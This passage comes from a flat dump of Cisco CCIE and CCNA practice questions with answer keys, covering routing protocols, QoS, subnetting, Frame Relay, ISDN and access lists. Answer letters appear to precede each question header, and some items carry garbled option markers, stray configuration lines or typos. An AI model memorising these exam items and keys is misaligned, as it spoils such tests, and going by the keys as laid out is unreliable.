Control Protocol (TCP) encapsulation, when will the Data Link Switching (DLSW)peers go into CONNECT state?^A. When test frame broadcasts are sent.^B. When the peers finish Capabilities Exchange.^C. Never- there is no such thing as the “CONNECT” state.^D. When the CUR/ICR exchange takes place. B #CCIE Q155 What protocol is not disabled by the ‘no service tcpservers’ command?^A. Echo^B. Finger^C. Chargen^D. Discard^E. Daytime B #CCIE Q156 IEEE 802.1D describes a method to prevent the disconnection of a single end station from disruptionSpanning Tree. ^ What does the method describe?^A. Re-setting the Topology Change flag to zero (0).^B. Disabling the 801.1D Change Detection parameter.^C. Configuring the BridgeForwardDelay to 1/2 of the BridgeMaxage.^D. Using the BridgeForwardDelay timer to age out dynamic entries. B #CCIE Q157 In IP multicast networks, the Reverse Path Forward (RPF) check is primarily used to:^A. Determine which interfaces should be including in the outgoing interface list.^B. Prevent multicast traffic from looping through the network.^C. Prevent multicast traffic from being sent by unauthorized sources.^D. Establish the reverse flow path of multicast traffic from the receiver to the source. C #CCIE Q158 What is not a primary goal of Random Early Discard?^A. Minimizing packet delay jitter.^B. Avoiding global synchronization for TCP traffic.^C. Supporting bursty traffic without bias.^D. Avoid starvation of the lower priority queues. B,C #CCIE Q161 Both GTS and FRTS are similar in implementation, but differ in regard to:^A. GTS applies only on a per interface basis and can use access lists to select the traffic to shape.^B. For GTS, the shaping queue is weighted fair queue (WFQ).For FRTS, WFQ is not supported; instead, the queue can be a CQ, PQ or FIFO.^C. FRTS supports shaping on a per-DLCI basis, while GTS is configurable per interface or subinterface.^D. GTS works with a variety of Layer 2 technologies, including Frame Relay, ATM, SwitchedMultimegabit Data Service, and Ethernet." B #CCIE Q162 A new 10/100 NIC is being connected to a Catalyst 5000 switch port. ^ Which settings will result in the bestconnection?^A. NIC: 100 Mbps & Full-duplexCatalyst: Auto^B. NIC: Auto Catalyst: 100 Mbps & Full-duplex^C. NIC: 100 Mbps & Half-duplex Catalyst: Auto^D. NIC: 10 Mbps & Halfduplex E #CCIE Q163 PIMv2 control messages are sent using which IP protocol?^A. UDP^B. TCP^C. IGMP^D. Protocol number 109^E. Protocol number 103 C,D,E #CCIE Q164 Which examples would have an administrative distance lower than 120?^A. External EIGRP routes.^B. iBGP routes.^C. Internal EIGRP routes.^D. Static routes.^E. ISIS routes A #CCIE Q165 Which statement is true?^A. PNNI has QoS awareness and has layer two reachability support.^B. PNNI ignores QoS and supports both layer two and three routing.^C. PNNI supports redistribution of IP routes to ATM routing tables and route dampening.^D. PNNI comes up automatically when a switch is brought up, while IP routing protocols require specificconfiguration commands.^E. PNNI must be connected in a three-level hierarchical topology; Ip does not require hierarchy." A #CCIE Q166 What is the function of the command bgp deterministic-med?^A. It makes BGP compare MEDs between different ASs.^B. It makes default metric count as the worst possible metric.^C. It makes default metric count as the best possible metric.^D. It recorders the entries by neighbor AS.^E. It recorders the entries by MED. A #CCIE Q167 When the interface summary command for EIGRP is used, the metric for the summarized route isderived:^A. From the component route that has the biggest metric.^B. From the component route that has the smallest metric.^C. From the interface that has the summary command.^D. From the component route which has the longest mask.^E. From the default-metric command. A #CCIE Q168 Which statements are correct?^A. Within one area of ISIS, all links must have ip router isis configured.At least one link in that area must have this command, if the IP routing is to work correctly.^B. In ISIS there is only one router responsible for originating the LSP for the LAN.It is called the pseudonode.^C. The protocol ID, found in the ip header of CLNS is type 203.^D. You can run ISIS for IP, event without configuring a NET on the router. D #CCIE Q169 Which are examples for Physical WAN interface standards?^A. EIA/TIA 232, EIA/TIA 449, RFC 1771, and V.35.^B. EIA/TIA 232, EIA/TIA 449, IEEE 802.3 and IEEE 802.5.^C. IEEE 802.3, IEEE 802.5, ISO 8648 and RFC 1771.^D. EIA/TIA 232, EIA/TIA 449, V.35, HSSI and EIA 530. C #CCIE Q170 According to the IEEE 802.3 CSMA/CD specification, which is proper signal for contact 6 of a PHYwithout an internal crossover MDI Signal?^A. Receive +^B. Transmit +^C. Receive –^D. Transmit – C #CCIE Q171 Which OSPF routers can originate an ASBR-summary LSA type 4?^A. Only ASBRs.^B. Only ABRs.^C. ASBRs and ABRs if they are originating indication LSAs.^D. ASBRs with the summary command for OSPF routes configured.^E. ABRs with the area-range command configured. A,C,D #CCIE Q172 Which BGP attributes are “well known”?^A. Next-hop^B. Aggregator^C. AS-path^D. Atomic-aggregate^E. MED B #CCIE Q173 BGP synchronization means:^A. A BGP router can only advertise an eBGP-learned route if the route is in the BGP table with a metric of0.^B. A BGP router can only advertise an eBGP-learned route if the route is in the routing table as an IGProute.^C. A BGP router can only advertise an iBGP-learned route if the route is in the routing table of all its iBGPneighbors.^D. A BGP router can only advertise an iBGP-learned route if the route is in the BGP table but not in therouting table.^E. A BGP router can only advertise an iBGP-learned route of the route is in the routing table as an IGProute. C #CCIE Q174 A serial interface needs to support IP-based voice traffic in a strict priority queue. ^ All other traffic shouldbe handled through the weighted fair queuing mechanism. ^ What interface level command would enablethe queue for the voice traffic?^A. ip llc-queue^B. ip rtp priority^C. priority-group^D. fair-queue E #CCIE Q175 What is the EIGRP multicast flow timer?^A. The timer after which EIGRP stops forwarding multicast data traffic.^B. The timeout timer after which EIGRP retransmits, unicasting the neighbor not in CR mode.^C. The time interval between consecutive received EIGRP hello intervals.^D. The timer interval between consecutive transmitted EIGRP hello intervals.^E. The timeout timer after which EIGRP retransmits, unicasting the neighbor in CR mode. B #CCIE Q176 RTP typically uses which protocols as a transport?^A. IP/TCP^B. IP/UDP^C. IP/RTCP^D. H.323/H.245^E. None of the above. C #CCIE Q177 The first ISUP message sent by an originating node when establishing a call using Signalling System 7 is:^A. an ACM^B. an ANM^C. an IAM^D. a REL^E. A RLC C #CCIE Q179 A serial interface with flow-based WFQ is carrying 25 flows. ^ Twelve flows are marked as IP Precedence0, ten flows are marked as IP Precedence 1, and three flows are marked as IP Precedence 5.^ Approximately how much interface bandwidth is allocated to one of the IP Precedence 5 flows?^A. 4%^B. 6%^C. 12%^D. 15%^E. 25% A #CCIE Q180 Through how many states do two ISIS neighbors pass when building their adjacency?^A. 2: Init, Up^B. 3: Init, 2-way, Full^C. 4: Start, Loading, Synchronizing, Up^D. 5: Init, 2-way, Exstart, Exchange, Up^E. 6: Init, 2-way, Exstart, Exchange, Full D #CCIE Q181 Which of these codecs consumes the most bandwidth?^A. G.729^B. G.723^C. GSM^D. G.711^E. G.728 A #CCIE Q182 On a Full Duplex Gigabit link between a Router and a switch the collision counter is incrementing.What is the likely cause?^A. Collisions cannot occur on a Full Duplex Gigabit Link so this is either due to a bug or brokenequipment.^B. The Router is receiving too much traffic and is asserting the Collision signal to be able to slow down therate that the switch is sending traffic.^C. Both the Router and the Switch attempted to send at the same time, both detected this and then backedoff and retransmitted after a random amount of time.This is not the problem.^D. The switch and the router might be running 802.1q trunking.When using 802.1q trunking, a collision is counted every time a frame comes in on an incorrect lengthfield. A #CCNA Q. 141 Which keystroke allows IOS to complete a partial command entry? ^A: ^B: ^C: ^D: B #CCNA Q. 265 Which configuration register setting tells the router to look in NVRAM for the boot sequence? ^A: 0x42 ^B: 0x2102 ^C:0x001 ^D: 0x2101 B #CCNA Q. 323 What is the bit pattern for the first octet of a class B network address? ^A: 0xxxxxxx ^B: 10xxxxxx ^C: 110xxxxx ^D: 1110xxxx ^E: 11110xxx A #CCNA Q. 237 What is the bit pattern for the first octet of a class A network address? ^A: 0xxxxxxx ^B: 10xxxxxx ^C: 110xxxxx ^D: 1110xxxx ^E: 11110xxx B #CCNA Q. 195 You are configuring a Frame Relay Router with subinterfaces on interface Serial 0. Which subinterface number could you use for this configuration? ^A: 1 and 2. ^B: 0.2 and 0.3 ^C: 1 and 1.1 ^D: 0.1a and 0.1^B: A #CCNA Q. 208 Calculate the number of usable networks and usable hosts for the network 210.106.14.0/24. ^A: 1 network with 254 hosts ^B: 2 networks with 128 hosts ^C: 4 networks with 64 hosts ^D: 6 networks with 30 hosts D #CCNA Q. 142 Eight stations connected to separate 10Mbps ports on a layer 2 switch will give each station how many Mbps of bandwidth? ^A: 1.25 ^B: 4 ^C: 16 ^D: 10 ^E: 60 C #CCNA Q. 50 What is the maximum length of the fast Ethernet cable 100BaseTx standard? ^A: 10 m ^B: 50 m ^C: 100 m ^D: 1000 m C #CCNA Q. 171 Which range of possible numbers do standard IPX access lists have? ^A: 100 - 199 ^B: 600 - 699 ^C: 800 - 899 ^D: 1000 - 1099 C #CCNA Q. 248 What is the range of binary values for the first octet in class B addresses? ^A: 10000000-11111111 ^B: 00000000-10111111 ^C: 10000000-10111111 ^D: 10000000-11011111 ^E: 11000000-11101111 C,D #CCNA Q. 254 Which of the following Ethernet standards can operate in full-duplex mode? (Choose two.) ^A: 10Base2 ^B: 10Base5 ^C: 10BaseT ^D: 100BaseT D #CCNA Q. 49 What is the maximum number of subnets that can be assigned to networks when using the address 172.16.0.0 with a subnet mask of 255.255.240.0? (Assume older version UNIX workstations are in use.) ^A: 16 ^B: 32 ^C: 30 ^D: 14 ^E: It is an invalid subnet mask for the Network B #CCNA Q. 95 What is the bandwidth capacity of an ISDN B channel? ^A: 16 Kbps ^B: 64 Kbps ^C: 128 Kbps ^D: 512 Kbps ^E: 1.54 Mbps D #CCNA Q. 134 Given an IP address of 172.16.2.160 and a subnet mask of 255.255.255.192, to which subnet does the host belong? ^A: 172.16.2.32 ^B: 172.16.2.64 ^C: 172.16.2.96 ^D: 172.16.2.128 ^E: 172.16.2.192 C #CCNA Q. 154 Which IP address range is allowable given an IP address of 172.37.2.56 and 28-bits of subnetting? ^A: 172.37.2.48 to 172.37.2.63 ^B: 172.37.2.48 to 172.37.2.6.2 ^C: 172.37.2.49 to 172.37.2.62 ^D: 172.37.2.49 to 172.37.2.63 ^E: 172.37.2.55 to 172.37.2.126 D #CCNA Q. 226 What is an example of a valid MAC address? ^A: 192.201.63.251 ^B: 19-22-01-63-25 ^C: 0000.1234.FEG ^D: 00-00-12-34-FE-AA A,C,D #CCNA Q. 31 Given the network 199.141.27.0 with a subnet mask of 255.255.255.240, identify the valid host addresses. (Choose three:) ^A: 199.141.27.33 ^B: 199.141.27.112 ^C: 199.141.27.119 ^D: 199.141.27.126 ^E: 199.141.27.175 A #CCNA Q. 131 How many valid host IP addresses are available on the following network/subnetwork? 176.12.44.16/30 ^A: 2 ^B: 30 ^C: 254 ^D: 16,382 ^E: 65,534 C #CCNA Q. 238 What is the network address for a host with the IP address 201.100.5.68/28? ^A: 201.100.5.0 ^B: 2001.100.5.32 ^C: 201.100.5.64 ^D: 201.100.5.65 ^E: 201.100.5.31 ^F: 201.100.5.1 B #CCNA Q. 314 Which of the following is a subnet broadcast address for network 201.57.78.0/27? ^A: 201.57.78.33 ^B: 201.57.78.64 ^C: 201.57.78.87 ^D: 201.57.78.97 ^E: 201.57.78.159 ^F: 201.57.78.254 E #CCNA Q. 174 What is the bit length and expression form of a MAC address? ^A: 24 bits expression as a decimal number ^B: 24 bits expression as a hexadecimal number ^C: 36 bits expression as a binary number ^D: 48 bits expression as a decimal number ^E: 48 bits expression as a hexadecimal number A #CCNA Q. 114 Which network mask should you place on a class C address to accommodate a user requirement of two sub networks with a maximum of 35 hosts on each network? ^A: 255.255.255.192 ^B: 255.255.255.224 ^C: 255.255.255.240 ^D: 255.255.255.248 B #CCNA Q. 205 Which network mask should you place on a class C address to accommodate a user requirement for five networks with a maximum of 17 hosts on each network? ^A: 255.255.255.192 ^B: 255.255.255.224 ^C: 255.255.255.240 ^D: 255.255.255.248 C #CCNA Q. 259 Which of the following describes isdn bri servie? ^A: 2d+b ^B: 23d+b ^C: 2b+d ^D: 23b+d E #CCNA Q. 196 What is the total bandwidth of all channels on a BRI circuit? ^A: 54 kps ^B: 64 kps ^C: 112 kps ^D: 128 kps ^E: 144 kps D #CCNA Q. 102 What is the distance limitation for 100BaseT? ^A: 607 ft ^B: 25 meters ^C: 1000 ft ^D: 100 meters ^E: 185 meters E #CCNA Q. 313 Calculate the number of usable network and host addresses for 213.105.72.0/28. ^A: 62 networks and 2 hosts ^B: 6 networks and 30 hosts ^C: 8 network and 32 hosts ^D: 16 networks and 16 hosts ^E: 14 networks and 14 hosts D #CCNA Q. 284 What IP address class is multicast? ^A: A ^B: B ^C: C ^D: D ^E: E A,B #CCNA Q. 69 Which two statements about a bridge are true. (Choose two) ^A: A bridge floods multicasts. ^B: A bridge floods broadcasts. ^C: A bridge does not flood multicasts. ^D: A bridge does not flood broadcasts. C #CCNA Q. 71 Which statement about an IP network is true? ^A: A broadcast source MAC contains all zeros. ^B: A MAC address is part of the physical layer of the OSI model. ^C: MAC addresses are used by bridges to make forwarding decisions: IP addresses are used by routers. ^D: IP addresses are now a flat addressing scheme: MAC addresses use a hierarchical addressing scheme. B,C #CCNA Q. 229 Which two statements about the Frame Tagging are true? (Choose two) ^A: A Filtering table is developed for each switch. ^B: Frame Tagging defines a unique user defined ID to each frame. ^C: A unique identifier is placed in the header of each frame as it is forwarding between switches. ^D: Frame Tagging is technique that examines particular information about each frame based on userdefined offsets. A,B #CCNA Q. 268 Which of the following statements regarding routed and routing protocols are true? (Choose two.) ^A: A routed protocol is assigned to an interface and determines the method of packet delivery. ^B: A routing protocol determines the path of a packet through a network. ^C: A routed protocol determines the path of a packet through a network. ^D: A routing protocol operates at the transport layer of the OSI model. ^E: A routed protocol updates the routing table of a router. D #CCNA Q. 267 Which of the following access list statements will deny all telnet connections to subnet 10.0.1.0/24? ^A: access-list 15 deny tcp 10.0.1.0 255.255.255.0 eq telnet ^B: access-list 115 deny tcp any 10.0.1.0 eq telnet ^C: access-list 115 deny udp any 10.0.1.0 eq 23 ^D: access-list 115 deny tcp any 10.0.1.0 0.0.0.255 eq 23 ^E: access-list 15 deny telnet any 10.0.1.0 0.0.0.255 eq 23 D #CCNA Q. 113 Which statement should you use to deny FTP access only from Network 210.93.105.0 to Network 223.8.151.0? ^A: Access-list one deny 210.93.105.0.0.0.0.0.0 any eq ftp access-list one permit any. ^B: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp ^C: Access-list 100 deny ip 223.8.151.0 0.0.0.255 any eq ftp Access-list 100 permit ip any any ^D: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp Access-list 100 permit ip any any B #CCNA Q. 96 Which command should you use to create an IP standard access list? ^A: Access-list standard 172.16.4.13 ^B: Access-list 1 deny 172.16.4.13 0.0.0.0 ^C: Access-list 100 deny 172.16.4.13 0.0.0.0 ^D: Access-list 198 deny 172.16.4.13 255.255.255.255 B #CCNA Q. 101 A network is very congested Currently all the devices are connected through a hub: Which solution would best decrease congestion on the network? ^A: Add a second hub ^B: Replace the hub with a router. ^C: Replace the hub with a switch. ^D: Replace the hub with a repeater. D #CCNA Q. 145 What does the command show access-list 101 list? ^A: All extended access lists. ^B: All access lists within the router. ^C: The contents of standard access list 101 ^D: The contents of extended access list 101 A,C,D,E #CCNA Q. 48 Which of the following are true regarding passwords on a Cisco router? ^A: All passwords can be encrypte^D: ^B: All passwords can be entered using the set-up dialogue. ^C: A password can be set before a user can enter the privileged mode. ^D: A password can be set for individual lines. ^E: TACACS or Radius password authentication can be use^D: A,C,D #CCNA Q. 258 What are the advantages of using the OSI layered network model? (Choose three) ^A: Allows multiple-vendor development through standardization of network components. ^B: Creates a list of communication rules that all companies must implement to get onto the Internet. ^C: Allows various types of network hardware and software to communicate. ^D: Prevents changes in one layer from affecting other layers, so it does not hamper development. ^E: Allows companies to develop proprietary interfaces. C #CCNA Q. 215 What are the generic parts of a network layer address? ^A: An internetnetwork number and a URL . ^B: A vendor code and a serial number. ^C: A network number and host number. ^D: A broadcast number and unicast number. ^E: A domain identifier and a device identifier. D #CCNA Q. 308 Which of the following is true concerning Frame Relay multipoint subinterfaces? ^A: An IP address is required on the physical interface of the central router. ^B: All routers are required to be fully meshe^D: ^C: All routers must be in the same subnet to forward routing updates and broadcasts ^D: Multipoint is the default configuration for Frame Relay subinterfaces. C #CCNA Q. 320 Which layer in the TCP/IP model corresponds to the OSI network layer? ^A: Application ^B: Transport ^C: Internet ^D: Network ^E: Physical D #CCNA Q. 292 Which OSI layer uses positive acknowledgement and retransmission to ensure reliable delivery? ^A: Application ^B: Presentation ^C: Session ^D: Transport ^E: Data link ^F: Physical D #CCNA Q. 252 Which OSI layer ensures reliable end-to-end delivery of data? ^A: application ^B: presentation ^C: session ^D: transport ^E: network B,C,E #CCNA Q. 249 Which of the following are TCP/IP Application layer protocols? (Choose three) ^A: ARP ^B: HTTP ^C: SMTP ^D: ETP ^E: ICMP A #CCNA Q. 274 What is the correct command to change the bandwidth of the interface to 64K? ^A: bandwidth 64 ^B: band width 64 ^C: bandwidth 64000 ^D: band width 64000 ^E: bandwidth 64K A #CCNA Q. 108 Which command allows the user to see a system message when logging into a router? ^A: Banner MOTD ^B: Message MOTD ^C: Banner Message ^D: Message Banner B #CCNA Q. 57 Which term describes the process in which frames from one network system are placed inside the frames of another network system? ^A: bridging ^B: tunneling ^C: data-link control ^D: generic routing ^E: packet switching B #CCNA Q. 157 What does the term \lquote Base\rquote refer to in 100BaseT? ^A: Cabling type ^B: Signaling type ^C: 100 mode type ^D: Spectrum used ^E: Speed category A,B,D #CCNA Q. 79 Which three are typical operational phases in a basic connection oriented network service? (Choose three) ^A: Call setup ^B: Data transfer ^C: Load Balancing ^D: Call termination ^E: Call prioritization ^F: Data segmentation ^G: Data link identification c #CCNA Q. 317 What does the word -any- mean in the following extended access list statement? access-list 101 permit ip any 192.168.69.0 0.0.0.255 eq tcp ^A: check any of the bits in the source address ^B: permit any wildcard mask for the address ^C: accept any source address ^D: check any bit in the destination address ^E: permit 255.255.255 0.0.0.0 ^F: accept any destination address B #CCNA Q. 130 Which element is used to define the rate, in bits per second, which a Frame Relay switch agrees to transfer data? ^A: Clock rate ^B: Committed information rate ^C: Local management interface ^D: Data-link connection identifier ^E: Committed rate measurement interval B #CCNA Q. 56 Which element is used to define the rate, in bits per second, that a Frame Relay switch agrees to transfer data? ^A: Clock rate (CR). ^B: Committed Information Rate (CIR) ^C: Local management interface (LMI) ^D: Data-link connection identifier (DLCI) ^E: Committed Rate Measurement Interval (CRMI) D #CCNA Q. 103 Which command sets the clock rate to 56 Kbps on serial0? ^A: clockrate 56 ^B: clock rate 56 ^C: clockrate 56000 ^D: clock rate 56000 ^E: set clockrate 56 ^F: serial 10 clockrate 56 ^G: clock rate 56000 serial 10 C #CCNA Q. 107 Which command retrieves the configuration file from NVRAM? ^A: Config NVRAM ^B: Copy NVRAM running-config ^C: Copy startup-config running-config ^D: Copy running-config startup-config A,B,F #CCNA Q. 181 Which three commands are used to configure information into RAM on a router. (Choose three) ^A: Configure memory ^B: Configure terminal ^C: Configure overwrite ^D: Copy TFTP startup-Config ^E: Copy running-Config startup-Config ^F: Copy startup-Config running-Config A #CCNA Q. 194 Which configuration task must you complete if a remote Frame Relay Router does not support Inverse ARP? ^A: Configure static maps. ^B: Define an IP address ^C: Disable DHCP on the Frame Relay router. ^D: Configure a static route to the remote network. C #CCNA Q. 184 You just entered the following command routers(config) #line console 0 Which operation is most likely to follow? ^A: Configure terminal type ^B: Enter protocol parameters for a serial line ^C: Create a password on the console terminal line. ^D: Establish a terminal type 4 connection to a remote host. ^E: Change from configuration mode to console privilege mode. B,C #CCNA Q. 149 Which two steps are parts of the process of creating Frame Relay subinterfaces on a point-point connection? (Choose Two) ^A: Configure the router to forward all broadcast packets ^B: Remove any network address assigned to the physical interface ^C: Configure the local data-link connection identifier for the subinterfaces ^D: Partition the total committed information rate available among the subinterfaces network 192.168.1.0 255.255.255.0 network 10.2.0.0 255.255.0.0 D #CCNA Q. 235 Which sequence of actions will allow telnetting from a user's PC to a router using TCP/IP? ^A: Connect the PC's COM port to the router's console port using a straight-through cable. ^B: Connect the PC's COM port to the router's console port using a crossover cable. ^C: Connect the PC's COM port to the router's Ethernet port using a straight-through cable.: ^D: Connect the PC's Ethernet port to the router's Ethernet port using a crossover cable. ^E: Connect the PC's Ethernet port to the router's Ethernet port using a rollover cable. ^F: Connect the PC's Ethernet port to the router's Ethernet port using a straight-through cable. D #CCNA Q. 37 Which parameter must be supplied when initializing the IGRP routing process? ^A: connected network numbers ^B: IP address mask: ^C: metric weights ^D: autonomous system number ^E: registered administrative id A,B,D #CCNA Q. 224 Which three functions are supported by connection oriented services? (Choose three) ^A: Connection parameters are synchronized ^B: Any loss or duplication of packets can be corrected ^C: The data packet is independently routed and the service does not guarantee the packet will be processed in order. ^D: A data communication path is established between the requesting entity and the peer device on the remote end system. C #CCNA Q. 175 Which command displays all the commands in the history buffer? ^A: control header ^B: show buffer ^C: show history ^D: show history buffer D #CCNA Q. 179 Which commands loads a new version of Cisco IOS into the router? ^A: Copy flash ftp ^B: Copy ftp flash ^C: Copy flash tftp ^D: Copy tftp flash A #CCNA Q. 106 Routers that have flash memory typically have preloaded copy of Cisco IOS software Which command should you use to make backup copy of the software image onto a network server? ^A: Copy Flash TFTP ^B: Save Copy TFTP ^C: Write Backup TFTP ^D: Write Backup (server-name) ^E: Copy backup 2 (server-name) C #CCNA Q. 213 You have powered on a new router and you want to create an initial configuration. Which mode should you use? ^A: Copy mode ^B: User mode ^C: Setup mode ^D: Startup mode F #CCNA Q. 122 With one method of transmitting fames through a switch the switch receives the complete frame and checks the frame CRC before forwarding the frame. What is this transmitting method called? ^A: CSMA/CD ^B: Full duplex. ^C: Cut through. ^D: Half duplex. ^E: Fragmentation. ^F: Stored and forwarde^D: C #CCNA Q. 228 Which one method for transporting frames through a switch which checks the destination address in the frame header immediately begins forwarding the frame. What is this frame transmission method called? ^A: CSMA/CD ^B: FULL DUPLEX ^C: CUT THROUGH ^D: HALF DUPLEX ^E: FRAGMENTATION ^F: STORE AND FORWARD C #CCNA Q. 290 Cisco IOS allows which keystroke(s) to complete the syntax of a partially entered command? ^A: Ctrl+shift+6 then x. ^B: Ctrl+Z ^C: TAB ^D: /? ^E: Shift A #CCNA Q. 105 In the setup dialogue what do the square bracket indicate? ^A: Current or default settings. ^B: Hard coded values that cannot be modifie^D: ^C: Values entered by the administrator but not save^D: ^D: Values that must be returned to NVRAM before becoming enable^D: D #CCNA Q. 13 A packet is the protocol data unit for which layer of the OSI model? ^A: Data link ^B: Session ^C: Presentation ^D: Network ^E: Transport B #CCNA Q. 319 At which OSI layer is the best path to a network determined? ^A: Data Link ^B: Network ^C: Physical ^D: Presentation ^E: Session ^F: Transport A #CCNA Q. 198 What does the Frame Relay switch use to distinguish between each PVC connection? ^A: Data link connection identifier (DLCIs) ^B: CNs ^C: FECNs ^D: Local management interface LMI F #CCNA Q. 255 What is the correct order of protocol data units in data encapsulation? ^A: Data, Frame, Packet, Segment, Bit ^B: Data, Frame, Segment, Packet, Bit ^C: Data, Packet, Frame, Segment, Bit ^D: Data, Packet, Segment, Frame, Bit ^E: Data, Segment, Frame, Packet, Bit ^F: Data, Segment, Packet, Frame, Bit C #CCNA Q. 8 During encapsulation in which order is information packaged? ^A: Data, Packet, Segment, Frame ^B: Segment, Data, Packet, Frame ^C: Data, Segment, Packet, Frame ^D: Packet, Data, Segment, frame A,B #CCNA Q. 190 Which are two steps are required to configure and apply standard access list on an interface? (Choose two) ^A: Define and access list number and its parameter. ^B: Enable an interface to become part of the access list group. ^C: Define the number of access list to be supported on an interface. ^D: Copy the access list definition to each interface that will support it. A,B,C #CCNA Q. 92 Which three tasks are required to configure a dial on demand routing (DDR) Basic Rate Interface (BRI) connection? (Choose three) ^A: Define static routes. ^B: Configure the dialer information. ^C: Specify interesting traffic that can enable the link. ^D: Define DDR password to exchange when the link comes up. C #CCNA Q. 185 Which information must a router have in order to perform proper and efficient routing? ^A: Destination application of an incoming packet ^B: Number of other packets in a single flow of data ^C: Destination network address of an incoming packet ^D: Number of routers that know a path to the destination A,C #CCNA Q. 86 Your network uses a class C address of 210.10.10.0 you must now split up the network into separate subnets to handle multiple buildings separated by router. Which two steps must you take to determine the proper subnet mask for your network? (Choose two) ^A: Determine the number of separate networks required ^B: Determine how many devices will require DHCP addressing. ^C: Determine the maximum number of host that will be on each subnet. ^D: Determine the minimum number of host that will be on each subnet. ^E: Determine which router will be the IP default gateway for each subnet. D #CCNA Q. 275 Which Frame Relay feature is responsible for transmitting keepalives to ensure that the PVC does not shut down because of inactivity? ^A: DLCI ^B: BECN ^C: FECN ^D: LMI ^E: CIR ^F: de A,B,C #CCNA Q. 94 Which three statements about Frame Relay configuration using sub interfaces are true? (Choose three) ^A: Each subinterface is configured either multi point or point to point. ^B: Any network address must be removed from the physical interface. ^C: The configuration of subinterfaces is done in router Config-(if)# mode. ^D: Frame relay encapsulation must be configured on each sub interface. A,B #CCNA Q. 83 What is the two most common request/reply pair with ICMP messages when using the ping command? (Choose two) ^A: Echo reply ^B: Echo request ^C: Source quench ^D: Fragment offset ^E: Information redirect ^F: Destination reachable ^G: Echo control message B,C #CCNA Q. 306 Which of the following are the characteristics of a Layer 2 Ethernet switch? (Choose two.) ^A: Establishes a single collision domain. ^B: Establishes multiple collision domains. ^C: Builds a dynamic MAC address mapping table ^D: Maintains a routing table ^E: Forwards unicast frames only. C,D #CCNA Q. 230 Which two physical interfaces does PPP support? (Choose two) ^A: Ethernet ^B: Token Ring ^C: Synchronous Serial ^D: Asynchronous Serial A,D #CCNA Q. 125 Which two statements are true? (Choose two) ^A: Ethernet 802.3 utilizes a half duplex method for data transfer. ^B: In a 100mbps point to point connect, a full duplex connection can provide 400mbs of data transfer. ^C: Ethernet switches can use the full duplex mode to connect multiple nodes on a single port office switch. ^D: Full duplex Ethernet takes advantage of UTP using one pair of transmission and other pair for reception. A,D #CCNA Q. 210 Which two IPX encapsulation names are correctly paired with the Cisco IOS encapsulation names? (Choose two) ^A: Ethernet_II-ARPA ^B: Ethernet_802.3-SAP ^C: Ethernet_802.2-LLLC ^D: Ethernet_SNAP-SNAP A #CCNA Q. 277 Identify the effect of Ctrl-Z? ^A: Exits back to privileged exec mode. ^B: Disconnects from the router. ^C: Aborts the ping operation. ^D: Exits privileged exec mode A,B,C,D #CCNA Q. 64 What are four ways that Fast Ethernet compares to 10BaseT Ethernet? (Choose four.) ^A: Fast Ethernet uses the Same Maximum Transmission Unit (MTU). ^B: Fast Ethernet is based on an extension to the IEEE 802.3 specification. ^C: Fast Ethernet uses the same Media Access control (MAC mechanisms). ^D: Fast Ethernet preserves the frame format that is used by 10BaseT Ethernet. ^E: Fast Ethernet offers a speed increase one hundred times that of the 10BaseT Ethernet. A,B,C,D #CCNA Q. 188 What are true four ways that fast Ethernet that compares to 10baseT Ethernet (Choose four) ^A: Fast Ethernet uses the same maximum transmission unit (MTU). ^B: Fast Ethernet is based on an extension to the IEE 802.3 specifications. ^C: Fast Ethernet uses the same media access control MAC mechanism. ^D: Fast Ethernet preserves the frame format that is used by the 10BaseT Ethernet. ^E: Fast Ethernet uses a speed increase 100 times to that of the 10BaseT Ethernet. D #CCNA Q. 279 Which WAN technology uses high-performance digital lines and IS packet switched? ^A: FDDI ^B: ISDN ^C: ATM ^D: Frame Relay A #CCNA Q. 245 When a router boots. Which default search sequence does it use to locate the IOS software? ^A: Flash, TFTP server, ROM ^B: NVRAM, TFTP server, ROM ^C: ROM, Flash, TFTP server ^D: ROM, NVRAM, TFTP server B #CCNA Q. 35 Which method does a Cisco Catalyst switch use to identify the VLAN membership of a frame over trunked links? ^A: Frame filtering with VLAN ID ^B: Frame tagging with VLAN ID ^C: Frame filtering with trunk ID ^D: Frame tagging with trunk ID ^E: Frame filtering with VTP port ID C #CCNA Q. 240 Which WAN service would a small office (SOHO) most likely choose as a backup for leased lines? ^A: frame relay with svc ^B: dedicated serial line ^C: isdn with ddr ^D: atm D,F #CCNA Q. 66 What are the two primary operating modes for frame switching? (Choose two) ^A: Full duplex ^B: Half duplex ^C: CSMA/CD ^D: Cut through ^E: Fragmentation ^F: Store and forward A,B,D,E #CCNA Q. 41 What are four benefits that can result from applying ISDN networking?(Choose four) ^A: Full time connectivity across the ISDN supported by Cisco IOS routing using dial on demand routing DDR ^B: Small office and home office sites can be economically supported with ISDN basic rate interface BRI services. ^C: ISDN replaces signaling system ss7 in the public switch telephone network PSTN backbone. ^D: ISDN can be used as a backup service for a lease line connection between the remote and central offices. network access servers NAS. B,C #CCNA Q. 304 Which of the following statements are true regarding full-duplex Ethernet when compared to half-duplex Ethernet? (Choose two.) ^A: Full-duplex Ethernet consists of a shared broadcast domain, while half-duplex Ethernet consists of a private broadcast domain. ^B: Full-duplex Ethernet is collision free, while half-duplex Ethernet is subject to collisions. ^C: Full-duplex Ethernet provides higher throughput than half-duplex Ethernet of the same bandwidth. ^D: Full-duplex Ethernet provides lower throughput than than half-duplex Ethernet of the same bandwidth. ^E: Full-duplex Ethernet consists of a shared cable segment, while half-duplex Ethernet provides a point-topoint link. C #CCNA Q. 271 You have just finished configuring a router. The changes have been made successfully and everything is working correctly. You then save your changes and reboot the router. None of your changes are active after reboot. However, when you look at the contents of startup-config, your changes are there: Which of the following indicates the source of the problem? ^A: Hardware failure NMVRAM prevents the router from loading the configuration. ^B: Startup-config in flash is corrupt and cannot be analyze^D: ^C: Router configuration register set to bypass startup configuration. ^D: Startup-config in NVRAM is corrupt and cannot be analyzed C #CCNA Q. 247 What is the default encapsulation type for Frame Relay on a Cisco router? ^A: HDLC ^B: PPP ^C: IETF ^D: Cisco ^E: ANSI C #CCNA Q. 110 What is the most common Layer 2 device? ^A: Hub ^B: Router ^C: Switch ^D: Repeater D #CCNA Q. 165 What is the most common mail to device? ^A: Hub ^B: Router ^C: Repeater ^D: Switch B #CCNA Q. 305 Which device can be used to segment broadcast domains? ^A: hub ^B: router ^C: bridge ^D: repeater C,D,E #CCNA Q. 239 Which devices can be used to segment a network? (Choose three) 